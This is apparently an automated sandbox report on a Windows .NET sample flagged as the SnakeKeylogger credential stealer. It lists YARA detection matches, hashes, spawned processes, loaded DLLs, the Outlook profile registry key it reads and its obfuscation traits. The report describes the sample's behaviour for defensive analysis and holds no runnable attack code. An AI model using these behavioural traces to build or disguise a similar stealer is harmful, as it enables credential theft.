                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6E5A4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D51860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D50040
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D51851
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158C147
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01587118
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158A088
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01585362
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158D278
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158C468
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158C738
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158E988
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_015869A0
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01583B95
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158CA08
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158CCD8
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158CFAA
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01583E09
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158E97A
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_0158F961
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_015829EC
                Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_01583AA1
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                Source: file.exe, 00000000.00000002.1824710332.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000000.1674901502.000000000050A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezoBx.exe8 vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002B72000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1827801084.0000000005180000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000000.00000002.1829845956.0000000007550000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002A51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000002.00000002.4143512458.0000000001137000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exe | Binary or memory string: OriginalFilenamezoBx.exe8 vs file.exe
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, -i.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vnF8bQU8cHxQZQTDPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.file.exe.7550000.5.raw.unpack, vnF8bQU8cHxQZQTDPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/6@3/3
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
                Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d29f8d37-5fb3-45b7-91e2-e835e38e5bb0
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | Virustotal: Detection: 42%
                Source: file.exe | ReversingLabs: Detection: 42%
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Accessibility.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Drawing.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdbC source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdb source: WERB432.tmp.dmp.5.dr

                Data Obfuscation

                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs.Net Code: b8fOFGF281 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs.Net Code: b8fOFGF281 System.Reflection.Assembly.Load(byte[])
                Source: file.exeStatic PE information: section name: .text entropy: 7.859078791569036
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, HyrVjh9CacVo9sXnV4.cs | High entropy of concatenated method names: 'TqcJU9MtB4', 'RhCJg5yxnH', 'pNPJyqfJr3', 'kBPJtEGKNx', 'LX2JVM1k2x', 'QRvJo8xwQH', 'Xw9JsVEiws', 'Lm5JInXkYD', 'VN8JaIks2b', 'IltJjbvrF6'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, ptp44AClmmRtQwH9OI.cs | High entropy of concatenated method names: 'ToString', 'tdRSjAuCL2', 'vlpStaSIXQ', 'TceSPqTDsS', 'Bt9SVYOBST', 'Qs4SoiFpkx', 'iKsSLdxaov', 'vQXSslo1ZX', 'aPLSIAVPNL', 'kVrSdEx01Y'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, jLx6J97JddKSKVYCTS.cs | High entropy of concatenated method names: 's93lrr8wfd', 'ykEln3DW2y', 'tUWmPJDbcU', 'oBQmV4XZ5x', 'm5umoQZS7G', 'UxEmLqUfEo', 'WErmslwgX8', 'c3lmIRlArf', 'BZMmdLJcY9', 'iTXmaCgd7P'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, na4FDnyOExEDDqNAoT.cs | High entropy of concatenated method names: 'UTfbhaJOGo', 'WF1bGoWCRr', 'nlrblMd6UV', 'weRbuAW658', 'Sr6bQ6XeZJ', 'G7KlBAEQey', 'Se5l6HQA00', 'Yf9lf5UgyY', 'OqQl4NviYc', 'muNlvPoewb'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, f3Qs7tzUqjxaSIcVDe.cs | High entropy of concatenated method names: 'I54Nq9X8iG', 'TECNUEvGYG', 'KZrNg0a8fA', 'Iq2NySjNJO', 'BDoNtAD3Bw', 'UDxNVS0jrq', 'n26NooBjZC', 'vKANcpcTbd', 'yFXN3dQRKn', 'D6INxP5FLu'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vnF8bQU8cHxQZQTDPO.cs | High entropy of concatenated method names: 'mNsGZ7INQj', 'xZKG0klSJL', 'SQKGCDPHZo', 'scpGkuyfAc', 'ulOGBbxHVG', 'LgsG6yRm6U', 'D5WGfNXJcm', 'QZJG4rwhQh', 'GAZGvCYEJ3', 'ciLG59xxUY'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | High entropy of concatenated method names: 'I4XpheYnAV', 'MTbpi5Olg9', 'ytIpGkMV1P', 'gxxpmLSZpp', 'HELpluRH8R', 'DmZpbZNVPp', 'D5bpuJ1SgR', 'zHwpQJrGDr', 'QTYpwCFCPd', 'OgZpKGZEMb'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, HSyrTIdPhOoMhSTO09.cs | High entropy of concatenated method names: 'WwBu3XdQUu', 'pVCux9wHir', 'j5MuF9b0fL', 'Lo3u88sKev', 'DYjurUP7Dm', 'hTIuq0j2Tf', 'lI3uniw50x', 'tQDuUvc3fA', 'KsuuggdwO0', 'Q4xu7AUKEF'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, faWF1Wf4SQe0KVDGFl.cs | High entropy of concatenated method names: 'oRqeRSv8bF', 'p5aeMM9RCt', 'u4seeJXmdb', 'IcMeH7Fdtn', 'RrAeTMJ6um', 'GWvec0Fo40', 'Dispose', 'BAbWi6mvi4', 'OPIWGFagv1', 'G4JWmeNfNo'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, iZcjPAkifOk9vWysUs.cs | High entropy of concatenated method names: 'Y6eMKxIkDK', 'V6JM1FyNVb', 'ToString', 'PjNMiK5ipU', 'Yq7MGZI05r', 'w50Mmj0q3k', 'ymwMlqN2aE', 'sqjMbKhBHg', 'zJsMumawNj', 'hOuMQ38rre'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, K234AYgBjhLT3xkslG.cs | High entropy of concatenated method names: 'Y6im8T1CdS', 'ovRmqoDav8', 'GXGmUcLeXb', 'MNpmgN77iC', 'VP5mRTnTMO', 'pQPmSmifIV', 'R72mMaJyst', 'RLcmWGMO7C', 'njemeRuqnQ', 'I08mNPuXnY'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, UttuLpGkkmZ8KDhNJ7.cs | High entropy of concatenated method names: 'Dispose', 'ke0DvKVDGF', 'WRIXtyWi6G', 'Pkm0a3a8Th', 'iCRD5BM7Ae', 'gW2DzwRpxh', 'ProcessDialogKey', 'tK0XEdqTBF', 'N6fXDRiC1g', 'YH7XXTfb7K'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, RdqTBFva6fRiC1g5H7.cs | High entropy of concatenated method names: 'JVgeyCmOVh', 'lnKet0YKC6', 'Dr0ePwcOAB', 'evceVbuYrd', 'rOQeoS7JRe', 'eOveLFRSxe', 'AMdes6mldK', 'eJ2eIukFtg', 'jUhedqMgsM', 'y4xeapSPHF'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, S3CT9ADEFVNxFGFiYcA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aaqNjFhnoK', 'yGjN2tNRx0', 'DiRN9cohO7', 'igoNZFkbxK', 'fVZN0YTngn', 'CmONCyQLKo', 'MAfNkaUwTD'
